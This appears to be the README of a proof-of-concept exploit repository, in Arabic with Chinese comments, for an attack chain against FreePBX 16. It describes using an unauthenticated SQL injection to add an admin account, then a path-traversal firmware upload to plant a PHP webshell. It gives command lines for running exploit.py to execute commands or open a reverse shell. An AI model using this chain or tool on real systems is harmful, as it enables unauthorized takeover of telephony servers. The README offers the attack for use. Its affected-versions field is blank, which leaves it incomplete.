
CVE-2025-57819-RCE_PoC
الملخص: يشرح هذا الدليل كيفية الجمع بين ثغرتين في FreePBX 16 (CVE-2025-57819 و CVE-2025-61678) لبناء سلسلة هجوم كاملة تبدأ من الوصول غير المُصادق وصولًا إلى تنفيذ التعليمات البرمجية عن بُعد (Remote Code Execution, RCE).
| رقم CVE | المكوّن المتأثر | التأثير ونوع الثغرة |
|---|---|---|
| CVE-2025-57819 | مُحمّل وحدة Endpoint (وسيط brand) | حقن SQL متعدد العبارات غير مُصادق (Unauthenticated Stacked SQL Injection) |
| CVE-2025-61678 | معالج رفع البرامج الثابتة في Endpoint Manager (وسيط fwbrand) | رفع ملفات تعسفي مُصادق / اجتياز المسار (Path Traversal) |
يتم استغلال ثغرة حقن SQL متعدد العبارات غير المُصادق عبر مُحمّل وحدات مساحات الأسماء (Namespaced Endpoint Loader) لإدراج حساب مسؤول جديد بصلاحيات كاملة مباشرةً في جدول ampusers.
استخدام بيانات اعتماد المسؤول المُنشأة حديثًا لتسجيل الدخول إلى الواجهة الخلفية لإدارة FreePBX.
يتم إساءة استخدام ميزة رفع البرامج الثابتة في Endpoint Manager بالاستفادة من ثغرة اجتياز المسار في وسيط fwbrand (../../../var/www/html/
) لكتابة WebShell بلغة PHP مباشرةً في الجذر الرئيسي لموقع الويب.استدعاء WebShell المُنشر لتنفيذ أمر نظام واحد أو إنشاء Reverse Shell تفاعلي.
الإصدارات المتأثرة:
توصية الإصلاح: يُرجى التحديث إلى أحدث إصدار مُصحح في أقرب وقت ممكن.
# 執行單一指令
python3 exploit.py --rhost pbx.example.com --command "id"
# 建立互動式 Reverse Shell (利用 pwntools 自動監聽)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
# 使用 Plain HTTP 與自訂通訊埠
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
| الخيار | الوصف |
|---|---|
| --rhost | [مطلوب] عنوان المضيف الهدف (Target Host) |
| --rport | منفذ الهدف (الافتراضي: 443) |
| --http | فرض استخدام HTTP بدلاً من HTTPS الافتراضي |